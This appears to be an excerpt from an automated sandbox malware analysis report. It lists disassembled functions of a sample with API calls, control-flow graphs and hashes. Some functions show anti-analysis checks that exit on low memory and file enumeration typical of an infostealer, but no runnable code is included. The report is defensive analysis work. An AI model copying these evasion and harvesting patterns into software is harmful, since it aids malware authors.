                                  • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 003E1046
                                  • VirtualAllocExNuma.KERNEL32(00000000), ref: 003E104D
                                  • ExitProcess.KERNEL32 ref: 003E1058
                                  • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 003E106C
                                  • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 003E10AB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                                  • String ID:
                                  • API String ID: 3477276466-0
                                  • Opcode ID: b9e3285c16b75a168dd5de0a9764a1d815d5b3ddebfd34146bbd634dc33138b5
                                  • Instruction ID: 64167a3f22a80b8b31080ea46405d22e097f88447a8d1326cf86a9f623d4735d
                                  • Opcode Fuzzy Hash: b9e3285c16b75a168dd5de0a9764a1d815d5b3ddebfd34146bbd634dc33138b5
                                  • Instruction Fuzzy Hash: 8901F4717403147BEB204A656C2AFAB77EEA785B06F249019F704E72C0D9B1ED008674
                                  Function 003FEE90 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2805 3fee90-3feeb5 call 3e2930 2808 3feec9-3feecd call 3e6c40 2805->2808 2809 3feeb7-3feebf 2805->2809 2812 3feed2-3feee8 StrCmpCA 2808->2812 2809->2808 2810 3feec1-3feec3 lstrcpy 2809->2810 2810->2808 2813 3feeea-3fef02 call 3e2a20 call 3e2930 2812->2813 2814 3fef11-3fef18 call 3e2a20 2812->2814 2823 3fef45-3fefa0 call 3e2a20 * 10 2813->2823 2824 3fef04-3fef0c 2813->2824 2820 3fef20-3fef28 2814->2820 2820->2820 2822 3fef2a-3fef37 call 3e2930 2820->2822 2822->2823 2830 3fef39 2822->2830 2824->2823 2826 3fef0e-3fef0f 2824->2826 2829 3fef3e-3fef3f lstrcpy 2826->2829 2829->2823 2830->2829
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003FEEC3
                                  • StrCmpCA.SHLWAPI(?,ERROR), ref: 003FEEDE
                                  • lstrcpy.KERNEL32(00000000,ERROR), ref: 003FEF3F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy
                                  • String ID: ERROR
                                  • API String ID: 3722407311-2861137601
                                  • Opcode ID: 238211ad316c2e71097509c88b2d393055b993a2e2016342557639731bdda4cf
                                  • Instruction ID: 3156587be8d2dab2b81e2b10eca51dc24f2a0cd87370d46736f70c7850f943e8
                                  • Opcode Fuzzy Hash: 238211ad316c2e71097509c88b2d393055b993a2e2016342557639731bdda4cf
                                  • Instruction Fuzzy Hash: D12115316202995BCB23FF7ADC46AAB37A8AF10300F055574B84ADF292DF70ED608790
                                  Function 003E10C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2886 3e10c0-3e10cb 2887 3e10d0-3e10dc 2886->2887 2889 3e10de-3e10f3 GlobalMemoryStatusEx 2887->2889 2890 3e10f5-3e1106 2889->2890 2891 3e1112-3e1114 ExitProcess 2889->2891 2892 3e111a-3e111d 2890->2892 2893 3e1108 2890->2893 2893->2891 2894 3e110a-3e1110 2893->2894 2894->2891 2894->2892
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitGlobalMemoryProcessStatus
                                  • String ID: @
                                  • API String ID: 803317263-2766056989
                                  • Opcode ID: f242a423b6cc58171ededb952d4aceb9bd8e1562cd976418480802a6e03974c6
                                  • Instruction ID: 7a5805fa62e5c8704c781229156ffbb740f138ef2f67c9bde8b154d73aac4242
                                  • Opcode Fuzzy Hash: f242a423b6cc58171ededb952d4aceb9bd8e1562cd976418480802a6e03974c6
                                  • Instruction Fuzzy Hash: AAF05C702182D49BEB51AA77DC0A32DF7D9EB01350F144B29DE9BC21C0E230CC408137
                                  Function 003F8C88 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2895 3f8c88-3f8cc4 StrCmpCA 2897 3f8ccd-3f8ce6 2895->2897 2898 3f8cc6-3f8cc7 ExitProcess 2895->2898 2900 3f8cec-3f8cf1 2897->2900 2901 3f8ee2-3f8eef call 3e2a20 2897->2901 2902 3f8cf6-3f8cf9 2900->2902 2904 3f8cff 2902->2904 2905 3f8ec3-3f8edc 2902->2905 2907 3f8dbd-3f8dcb StrCmpCA 2904->2907 2908 3f8ddd-3f8deb StrCmpCA 2904->2908 2909 3f8dfd-3f8e0b StrCmpCA 2904->2909 2910 3f8e1d-3f8e2b StrCmpCA 2904->2910 2911 3f8e3d-3f8e4b StrCmpCA 2904->2911 2912 3f8d5a-3f8d69 lstrlen 2904->2912 2913 3f8e56-3f8e64 StrCmpCA 2904->2913 2914 3f8d30-3f8d3f lstrlen 2904->2914 2915 3f8e6f-3f8e7d StrCmpCA 2904->2915 2916 3f8e88-3f8e9a lstrlen 2904->2916 2917 3f8d06-3f8d15 lstrlen 2904->2917 2918 3f8d84-3f8d92 StrCmpCA 2904->2918 2919 3f8da4-3f8db8 StrCmpCA 2904->2919 2905->2901 2942 3f8cf3 2905->2942 2907->2905 2924 3f8dd1-3f8dd8 2907->2924 2908->2905 2925 3f8df1-3f8df8 2908->2925 2909->2905 2926 3f8e11-3f8e18 2909->2926 2910->2905 2927 3f8e31-3f8e38 2910->2927 2911->2905 2928 3f8e4d-3f8e54 2911->2928 2920 3f8d6b-3f8d70 call 3e2a20 2912->2920 2921 3f8d73-3f8d7f call 3e2930 2912->2921 2913->2905 2931 3f8e66-3f8e6d 2913->2931 2935 3f8d49-3f8d55 call 3e2930 2914->2935 2936 3f8d41-3f8d46 call 3e2a20 2914->2936 2915->2905 2932 3f8e7f-3f8e86 2915->2932 2933 3f8e9c-3f8ea1 call 3e2a20 2916->2933 2934 3f8ea4-3f8eb0 call 3e2930 2916->2934 2929 3f8d1f-3f8d2b call 3e2930 2917->2929 2930 3f8d17-3f8d1c call 3e2a20 2917->2930 2918->2905 2923 3f8d98-3f8d9f 2918->2923 2919->2905 2920->2921 2954 3f8eb3-3f8eb5 2921->2954 2923->2905 2924->2905 2925->2905 2926->2905 2927->2905 2928->2905 2929->2954 2930->2929 2931->2905 2932->2905 2933->2934 2934->2954 2935->2954 2936->2935 2942->2902 2954->2905 2955 3f8eb7-3f8eb9 2954->2955 2955->2905 2956 3f8ebb-3f8ebd lstrcpy 2955->2956 2956->2905
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess
                                  • String ID: block
                                  • API String ID: 621844428-2199623458
                                  • Opcode ID: 9770251cb7f5d548ba09b12ff5bcca54faf37beeab91bf477b93e3287260ff2e
                                  • Instruction ID: bef85f2ff5660413b9f03b1d0545769317ad6d1afb2790b102f761e74a428fef
                                  • Opcode Fuzzy Hash: 9770251cb7f5d548ba09b12ff5bcca54faf37beeab91bf477b93e3287260ff2e
                                  • Instruction Fuzzy Hash: 87E0923550434AEBC7149BB99CA89C2FB79EF89304B65446AE6005B650E730EC16C769
                                  Function 00402AD0 Relevance: 4.5, APIs: 3, Instructions: 44memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2957 402ad0-402b22 GetProcessHeap RtlAllocateHeap GetComputerNameA 2958 402b44-402b59 2957->2958 2959 402b24-402b36 2957->2959
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00402AFF
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00402B06
                                  • GetComputerNameA.KERNEL32(00000000,00000104), ref: 00402B1A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateComputerNameProcess
                                  • String ID:
                                  • API String ID: 1664310425-0
                                  • Opcode ID: 7e7a65724865911a8f9b91189e007155b5cf22cfb187efd8af4d1f08456ed265
                                  • Instruction ID: eaf43adfa8dc55f22b18dfbeb56abaa3bfc1aab9962f63c31396d7bd6c3c8115
                                  • Opcode Fuzzy Hash: 7e7a65724865911a8f9b91189e007155b5cf22cfb187efd8af4d1f08456ed265
                                  • Instruction Fuzzy Hash: 7D01D672A44608ABC710CF99ED45B9EF7B8F748B22F00426BF915E3780D778190087A5

                                  Non-executed Functions

                                  Function 003F2390 Relevance: 223.6, APIs: 126, Strings: 1, Instructions: 1308stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003F23D4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F23F7
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003F2402
                                  • lstrlen.KERNEL32(\*.*), ref: 003F240D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F242A
                                  • lstrcat.KERNEL32(00000000,\*.*), ref: 003F2436
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F246A
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 003F2486
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                  • String ID: \*.*
                                  • API String ID: 2567437900-1173974218
                                  • Opcode ID: efd8ada7aa876cedbdd5412fe24b2625d0583487009dc63d568cd7394e12366d
                                  • Instruction ID: 02427d2bcba05196493b36b58eb0ee89569406c617fff37af4138a18b59b399f
                                  • Opcode Fuzzy Hash: efd8ada7aa876cedbdd5412fe24b2625d0583487009dc63d568cd7394e12366d
                                  • Instruction Fuzzy Hash: 9AA2913190126ADFCB22EF75DC89AAF77B9AF04700F099129F909E7291DB74DD418B60
                                  Function 003E16A0 Relevance: 202.4, APIs: 114, Strings: 1, Instructions: 1164stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003E16E2
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003E1719
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E176C
                                  • lstrcat.KERNEL32(00000000), ref: 003E1776
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E17A2
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E17EF
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003E17F9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E1825
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E1875
                                  • lstrcat.KERNEL32(00000000), ref: 003E187F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E18AB
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003E18F3
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003E18FE
                                  • lstrlen.KERNEL32(00411794), ref: 003E1909
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E1929
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003E1935
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E195B
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003E1966
                                  • lstrlen.KERNEL32(\*.*), ref: 003E1971
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E198E
                                  • lstrcat.KERNEL32(00000000,\*.*), ref: 003E199A
                                    • Part of subcall function 00404040: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 0040406D
                                    • Part of subcall function 00404040: lstrcpy.KERNEL32(00000000,?), ref: 004040A2
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E19C3
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003E1A0E
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003E1A16
                                  • lstrlen.KERNEL32(00411794), ref: 003E1A21
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E1A41
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003E1A4D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E1A76
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003E1A81
                                  • lstrlen.KERNEL32(00411794), ref: 003E1A8C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E1AAC
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003E1AB8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E1ADE
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003E1AE9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E1B11
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 003E1B45
                                  • StrCmpCA.SHLWAPI(?,004117A0), ref: 003E1B70
                                  • StrCmpCA.SHLWAPI(?,004117A4), ref: 003E1B8A
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003E1BC4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003E1BFB
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003E1C03
                                  • lstrlen.KERNEL32(00411794), ref: 003E1C0E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E1C31
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003E1C3D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E1C69
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003E1C74
                                  • lstrlen.KERNEL32(00411794), ref: 003E1C7F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E1CA2
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003E1CAE
                                  • lstrlen.KERNEL32(?), ref: 003E1CBB
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E1CDB
                                  • lstrcat.KERNEL32(00000000,?), ref: 003E1CE9
                                  • lstrlen.KERNEL32(00411794), ref: 003E1CF4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003E1D14
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003E1D20
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E1D46
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003E1D51
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E1D7D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E1DE0
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003E1DEB
                                  • lstrlen.KERNEL32(00411794), ref: 003E1DF6
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E1E19
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003E1E25
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E1E4B
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003E1E56
                                  • lstrlen.KERNEL32(00411794), ref: 003E1E61
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003E1E81
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003E1E8D
                                  • lstrlen.KERNEL32(?), ref: 003E1E9A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E1EBA
                                  • lstrcat.KERNEL32(00000000,?), ref: 003E1EC8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E1EF4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E1F3E
                                  • GetFileAttributesA.KERNEL32(00000000), ref: 003E1F45
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003E1F9F
                                  • lstrlen.KERNEL32(011A8A18), ref: 003E1FAE
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003E1FDB
                                  • lstrcat.KERNEL32(00000000,?), ref: 003E1FE3
                                  • lstrlen.KERNEL32(00411794), ref: 003E1FEE
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E200E
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003E201A
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003E2042
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003E204D
                                  • lstrlen.KERNEL32(00411794), ref: 003E2058
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E2075
                                  • lstrcat.KERNEL32(00000000,00411794), ref: 003E2081
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
